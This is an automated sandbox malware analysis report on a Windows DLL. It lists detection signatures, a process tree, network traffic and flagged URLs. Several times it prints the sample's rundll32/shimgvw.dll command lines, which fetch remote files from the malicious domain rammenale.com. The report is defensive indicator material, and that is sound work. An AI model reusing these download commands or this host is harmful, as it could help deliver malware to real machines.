Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LLD5HDX0PS.dll

Overview

General Information

Sample name:LLD5HDX0PS.dll
renamed because original name is a hash value
Original sample name:4b74d5e09bca4898a782e938a8f9889b9ebadf8b0f14368bca90d9d0e68da472.dll
Analysis ID:1500944
MD5:030a68e321dec0e77b4698fccc5d54db
SHA1:7b792a49fe27a298343ba26db8cac5ccb150ff89
SHA256:4b74d5e09bca4898a782e938a8f9889b9ebadf8b0f14368bca90d9d0e68da472
Tags:dllrammenale-com
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
Sigma detected: rundll32 run dll from internet
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Rundll32 Activity
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3224 cmdline: loaddll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 2268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1488 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 2192 cmdline: rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 5308 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 5332 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6092 cmdline: rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 5960 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 4988 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5432 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6136 cmdline: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Potentially Suspicious Rundll32 Activity
Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6092, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 5960, ProcessName: rundll32.exe

Data Obfuscation

barindex
Sigma detected: Execute DLL with spoofed extension
Source: Process startedAuthor: Joe Security: Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6092, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 5960, ProcessName: rundll32.exe
Sigma detected: rundll32 run dll from internet
Source: Process startedAuthor: Joe Security: Data: Command: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6092, ParentProcessName: rundll32.exe, ProcessCommandLine: rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt, ProcessId: 5960, ProcessName: rundll32.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://rammenale.com/for2/regit.tmp%SAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpsoftAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogIDAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpgQAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4zAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4wAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpmbtAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4mAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpnfAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp44uzAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp?JAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp%fAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpOJAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt6634-1003.munAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt6634-1003Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4FAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4DAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmphAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpPAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpKAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtC:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpuSAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpSAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtlAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtsoftAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtgAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpGAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtuAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtsAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtrAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtqAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpEAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp0Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp1Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp3wAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtzAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp8Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp3Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4IAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4#Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpentAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtx4CAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtJAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtIAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtfs:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtM3Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmprI3-Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtTAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt44Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp&btAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtPAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpentfcAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4GAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp0sAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpkbuAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regMAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp(fAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpkJAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtfAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtdAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpWJzAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpsC:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt_Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4XAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4WAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp6634-1003VbtAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt)Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtentAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp4$Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmp~Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4PAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt2Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmplSAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt4hAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpqAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txt9Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmplAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpmAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpBJjAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtF2Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclogDeviceAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtCAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpzAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/aclog.txtAAvira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpC:Avira URL Cloud: Label: malware
Source: https://rammenale.com/for2/regit.tmpuAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: LLD5HDX0PS.dllVirustotal: Detection: 10%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.7% probability
Source: LLD5HDX0PS.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: LLD5HDX0PS.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEE1B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,0_2_6BEE1B85
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEF38F4 FindFirstFileExW,0_2_6BEF38F4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE61B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,3_2_6FE61B85
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE738F4 FindFirstFileExW,3_2_6FE738F4

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 131.153.206.231 443
Source: Joe Sandbox ViewASN Name: SS-ASHUS SS-ASHUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/regit.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /for2/aclog.txt HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rammenale.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: rammenale.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 29 Aug 2024 04:53:05 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.Dc.
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000813B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F96000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F7E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.000000000881B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/-H
Source: rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/2.168.2.6
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/7
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/_T
Source: rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/fo
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.00000000034F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt$
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt)
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt2
Source: rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4#
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt44
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4G
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4P
Source: rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4W
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4X
Source: rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt4h
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008A93000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt6634-1003
Source: rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt6634-1003.mun
Source: rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt9
Source: rundll32.exe, 00000005.00000002.3370723210.0000000003050000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3370922957.0000000003080000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3371348346.0000000003700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txt:
Source: rundll32.exe, 00000007.00000002.3369345966.0000000000C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtA
Source: rundll32.exe, 00000005.00000002.3369497741.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/aclog.txtC
